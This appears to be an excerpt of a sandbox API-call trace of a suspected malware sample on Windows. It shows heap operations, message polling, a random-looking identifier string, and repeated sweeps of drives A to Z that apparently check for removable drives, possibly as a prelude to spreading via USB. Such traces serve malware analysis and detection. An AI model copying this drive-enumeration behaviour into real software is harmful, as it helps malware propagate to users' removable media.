GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.573] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.573] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.574] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0206.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0206.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0206.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.575] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0206.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0206.576] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.576] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0206.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.577] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.577] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.577] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.577] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.577] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.577] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.577] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.578] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.578] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.578] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.578] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.578] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.578] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.579] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.579] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.579] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.579] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.579] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.579] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.579] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.580] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.580] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.580] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.580] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.580] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.627] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.627] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0206.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0206.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.628] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0206.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0206.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0206.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0206.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0206.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0206.628] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0206.628] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0206.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.629] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0206.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0206.629] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.629] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.629] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.629] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.629] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.630] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.630] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.630] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.630] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.630] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.630] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.630] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.631] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.631] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.631] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.631] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.631] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.631] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.632] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.632] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.632] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.632] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.632] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.632] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.632] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.633] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.633] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.633] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.633] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.633] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0206.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.634] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.634] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0206.634] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.635] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0206.635] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.635] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.635] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.635] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.635] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.635] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.636] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.636] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.636] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.636] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.636] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.636] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.636] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.637] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.637] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.637] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.637] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.638] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.638] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.638] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.638] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.638] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.638] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.639] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.639] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.639] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.639] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.639] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.639] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.639] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.640] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0206.640] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0206.640] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0206.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 